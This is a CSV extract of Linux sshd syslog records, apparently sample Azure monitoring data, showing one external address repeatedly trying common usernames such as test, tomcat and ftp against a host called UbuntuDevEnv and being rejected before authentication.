+19664,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:46,UbuntuDevEnv,2019-06-06 18:07:45,auth,UbuntuDevEnv,info,Disconnected from invalid user git 128.199.149.61 port 54446 [preauth],10275,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,git,128.199.149.6,54446,,
+19665,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:53,UbuntuDevEnv,2019-06-06 18:07:52,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 128.199.149.61 port 59068 [preauth],10290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,128.199.149.6,59068,,
+19666,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:07:53,UbuntuDevEnv,2019-06-06 18:07:52,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 59068:11: Normal Shutdown, Thank you for playing [preauth]",10290,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,59068,,
+19667,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:00,UbuntuDevEnv,2019-06-06 18:08:00,auth,UbuntuDevEnv,info,Invalid user testuser from 128.199.149.61 port 35454,10305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,128.199.149.6,35454,,
+19668,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:00,UbuntuDevEnv,2019-06-06 18:08:00,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 35454:11: Normal Shutdown, Thank you for playing [preauth]",10305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,35454,,
+19669,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:00,UbuntuDevEnv,2019-06-06 18:08:00,auth,UbuntuDevEnv,info,Disconnected from invalid user testuser 128.199.149.61 port 35454 [preauth],10305,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,testuser,128.199.149.6,35454,,
+19670,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:07,UbuntuDevEnv,2019-06-06 18:08:07,auth,UbuntuDevEnv,info,Invalid user user from 128.199.149.61 port 40082,10314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,128.199.149.6,40082,,
+19671,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:07,UbuntuDevEnv,2019-06-06 18:08:07,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 40082:11: Normal Shutdown, Thank you for playing [preauth]",10314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,40082,,
+19672,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:07,UbuntuDevEnv,2019-06-06 18:08:07,auth,UbuntuDevEnv,info,Disconnected from invalid user user 128.199.149.61 port 40082 [preauth],10314,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user,128.199.149.6,40082,,
+19673,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:14,UbuntuDevEnv,2019-06-06 18:08:13,auth,UbuntuDevEnv,info,Invalid user user1 from 128.199.149.61 port 44696,10333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,128.199.149.6,44696,,
+19674,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:14,UbuntuDevEnv,2019-06-06 18:08:13,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 44696:11: Normal Shutdown, Thank you for playing [preauth]",10333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,44696,,
+19675,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:14,UbuntuDevEnv,2019-06-06 18:08:13,auth,UbuntuDevEnv,info,Disconnected from invalid user user1 128.199.149.61 port 44696 [preauth],10333,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user1,128.199.149.6,44696,,
+19676,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:20,UbuntuDevEnv,2019-06-06 18:08:20,auth,UbuntuDevEnv,info,Invalid user user2 from 128.199.149.61 port 49326,10343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,128.199.149.6,49326,,
+19677,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:21,UbuntuDevEnv,2019-06-06 18:08:20,auth,UbuntuDevEnv,info,Disconnected from invalid user user2 128.199.149.61 port 49326 [preauth],10343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,user2,128.199.149.6,49326,,
+19678,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:21,UbuntuDevEnv,2019-06-06 18:08:20,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 49326:11: Normal Shutdown, Thank you for playing [preauth]",10343,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,49326,,
+19679,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:27,UbuntuDevEnv,2019-06-06 18:08:27,auth,UbuntuDevEnv,info,Invalid user temp from 128.199.149.61 port 53950,10349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,128.199.149.6,53950,,
+19680,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:27,UbuntuDevEnv,2019-06-06 18:08:27,auth,UbuntuDevEnv,info,Disconnected from invalid user temp 128.199.149.61 port 53950 [preauth],10349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,128.199.149.6,53950,,
+19681,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:27,UbuntuDevEnv,2019-06-06 18:08:27,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 53950:11: Normal Shutdown, Thank you for playing [preauth]",10349,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,53950,,
+19682,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:34,UbuntuDevEnv,2019-06-06 18:08:33,auth,UbuntuDevEnv,info,Invalid user john from 128.199.149.61 port 58568,10362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,john,128.199.149.6,58568,,
+19683,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:34,UbuntuDevEnv,2019-06-06 18:08:33,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 58568:11: Normal Shutdown, Thank you for playing [preauth]",10362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,58568,,
+19684,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:34,UbuntuDevEnv,2019-06-06 18:08:33,auth,UbuntuDevEnv,info,Disconnected from invalid user john 128.199.149.61 port 58568 [preauth],10362,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,john,128.199.149.6,58568,,
+19685,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:41,UbuntuDevEnv,2019-06-06 18:08:40,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 34962:11: Normal Shutdown, Thank you for playing [preauth]",10372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,34962,,
+19686,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:41,UbuntuDevEnv,2019-06-06 18:08:40,auth,UbuntuDevEnv,info,Disconnected from authenticating user mysql 128.199.149.61 port 34962 [preauth],10372,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,mysql,128.199.149.6,34962,,
+19687,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:47,UbuntuDevEnv,2019-06-06 18:08:46,auth,UbuntuDevEnv,info,Invalid user edu from 128.199.149.61 port 39588,10383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,128.199.149.6,39588,,
+19688,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:47,UbuntuDevEnv,2019-06-06 18:08:47,auth,UbuntuDevEnv,info,Disconnected from invalid user edu 128.199.149.61 port 39588 [preauth],10383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,edu,128.199.149.6,39588,,
+19689,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:47,UbuntuDevEnv,2019-06-06 18:08:47,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 39588:11: Normal Shutdown, Thank you for playing [preauth]",10383,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,39588,,
+19690,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:54,UbuntuDevEnv,2019-06-06 18:08:53,auth,UbuntuDevEnv,info,Invalid user tomcat from 128.199.149.61 port 44212,10398,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,128.199.149.6,44212,,
+19691,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:54,UbuntuDevEnv,2019-06-06 18:08:54,auth,UbuntuDevEnv,info,Disconnected from invalid user tomcat 128.199.149.61 port 44212 [preauth],10398,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat,128.199.149.6,44212,,
+19692,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:08:54,UbuntuDevEnv,2019-06-06 18:08:54,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 44212:11: Normal Shutdown, Thank you for playing [preauth]",10398,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,44212,,
+19693,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:01,UbuntuDevEnv,2019-06-06 18:09:01,auth,UbuntuDevEnv,info,Invalid user tomcat2 from 128.199.149.61 port 48836,10413,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat2,128.199.149.6,48836,,
+19694,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:01,UbuntuDevEnv,2019-06-06 18:09:01,auth,UbuntuDevEnv,info,Disconnected from invalid user tomcat2 128.199.149.61 port 48836 [preauth],10413,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,tomcat2,128.199.149.6,48836,,
+19695,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:01,UbuntuDevEnv,2019-06-06 18:09:01,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 48836:11: Normal Shutdown, Thank you for playing [preauth]",10413,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,48836,,
+19696,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:08,UbuntuDevEnv,2019-06-06 18:09:08,auth,UbuntuDevEnv,info,Invalid user eduard from 128.199.149.61 port 53460,10421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eduard,128.199.149.6,53460,,
+19697,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:09,UbuntuDevEnv,2019-06-06 18:09:08,auth,UbuntuDevEnv,info,Disconnected from invalid user eduard 128.199.149.61 port 53460 [preauth],10421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,eduard,128.199.149.6,53460,,
+19698,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:09,UbuntuDevEnv,2019-06-06 18:09:08,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 53460:11: Normal Shutdown, Thank you for playing [preauth]",10421,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,53460,,
+19699,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:15,UbuntuDevEnv,2019-06-06 18:09:14,auth,UbuntuDevEnv,info,Invalid user info from 128.199.149.61 port 58084,10440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,128.199.149.6,58084,,
+19700,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:15,UbuntuDevEnv,2019-06-06 18:09:14,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 58084:11: Normal Shutdown, Thank you for playing [preauth]",10440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,58084,,
+19701,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:15,UbuntuDevEnv,2019-06-06 18:09:14,auth,UbuntuDevEnv,info,Disconnected from invalid user info 128.199.149.61 port 58084 [preauth],10440,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,info,128.199.149.6,58084,,
+19702,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:21,UbuntuDevEnv,2019-06-06 18:09:21,auth,UbuntuDevEnv,info,Invalid user daniel from 128.199.149.61 port 34474,10450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,daniel,128.199.149.6,34474,,
+19703,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:21,UbuntuDevEnv,2019-06-06 18:09:21,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 34474:11: Normal Shutdown, Thank you for playing [preauth]",10450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,34474,,
+19704,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:21,UbuntuDevEnv,2019-06-06 18:09:21,auth,UbuntuDevEnv,info,Disconnected from invalid user daniel 128.199.149.61 port 34474 [preauth],10450,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,daniel,128.199.149.6,34474,,
+19705,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:28,UbuntuDevEnv,2019-06-06 18:09:28,auth,UbuntuDevEnv,info,Invalid user dany from 128.199.149.61 port 39096,10461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dany,128.199.149.6,39096,,
+19706,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:29,UbuntuDevEnv,2019-06-06 18:09:28,auth,UbuntuDevEnv,info,Disconnected from invalid user dany 128.199.149.61 port 39096 [preauth],10461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,dany,128.199.149.6,39096,,
+19707,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:29,UbuntuDevEnv,2019-06-06 18:09:28,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 39096:11: Normal Shutdown, Thank you for playing [preauth]",10461,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,39096,,
+19708,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:36,UbuntuDevEnv,2019-06-06 18:09:35,auth,UbuntuDevEnv,info,Invalid user diego from 128.199.149.61 port 43746,10473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diego,128.199.149.6,43746,,
+19709,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:36,UbuntuDevEnv,2019-06-06 18:09:35,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 43746:11: Normal Shutdown, Thank you for playing [preauth]",10473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,43746,,
+19710,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:36,UbuntuDevEnv,2019-06-06 18:09:35,auth,UbuntuDevEnv,info,Disconnected from invalid user diego 128.199.149.61 port 43746 [preauth],10473,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,diego,128.199.149.6,43746,,
+19711,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:42,UbuntuDevEnv,2019-06-06 18:09:42,auth,UbuntuDevEnv,info,Invalid user vnc from 128.199.149.61 port 48342,10479,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vnc,128.199.149.6,48342,,
+19712,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:42,UbuntuDevEnv,2019-06-06 18:09:42,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 48342:11: Normal Shutdown, Thank you for playing [preauth]",10479,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,48342,,
+19713,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:42,UbuntuDevEnv,2019-06-06 18:09:42,auth,UbuntuDevEnv,info,Disconnected from invalid user vnc 128.199.149.61 port 48342 [preauth],10479,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vnc,128.199.149.6,48342,,
+19714,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:49,UbuntuDevEnv,2019-06-06 18:09:49,auth,UbuntuDevEnv,info,Invalid user ramon from 128.199.149.61 port 52962,10491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ramon,128.199.149.6,52962,,
+19715,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:49,UbuntuDevEnv,2019-06-06 18:09:49,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 52962:11: Normal Shutdown, Thank you for playing [preauth]",10491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,52962,,
+19716,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:49,UbuntuDevEnv,2019-06-06 18:09:49,auth,UbuntuDevEnv,info,Disconnected from invalid user ramon 128.199.149.61 port 52962 [preauth],10491,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ramon,128.199.149.6,52962,,
+19717,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:56,UbuntuDevEnv,2019-06-06 18:09:56,auth,UbuntuDevEnv,info,Invalid user ftp from 128.199.149.61 port 57582,10509,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,128.199.149.6,57582,,
+19718,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:56,UbuntuDevEnv,2019-06-06 18:09:56,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp 128.199.149.61 port 57582 [preauth],10509,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp,128.199.149.6,57582,,
+19719,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:09:56,UbuntuDevEnv,2019-06-06 18:09:56,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 57582:11: Normal Shutdown, Thank you for playing [preauth]",10509,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,57582,,
+19720,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:03,UbuntuDevEnv,2019-06-06 18:10:02,auth,UbuntuDevEnv,info,Invalid user ftp1 from 128.199.149.61 port 33996,10520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,128.199.149.6,33996,,
+19721,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:03,UbuntuDevEnv,2019-06-06 18:10:02,auth,UbuntuDevEnv,info,"Received disconnect from 128.199.149.61 port 33996:11: Normal Shutdown, Thank you for playing [preauth]",10520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,128.199.149.6,33996,,
+19722,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:03,UbuntuDevEnv,2019-06-06 18:10:02,auth,UbuntuDevEnv,info,Disconnected from invalid user ftp1 128.199.149.61 port 33996 [preauth],10520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftp1,128.199.149.6,33996,,
+19723,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-06 18:10:10,UbuntuDevEnv,2019-06-06 18:10:10,auth,UbuntuDevEnv,info,Invalid user ftpuser from 128.199.149.61 port 38592,10536,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ftpuser,128.199.149.6,38592,,
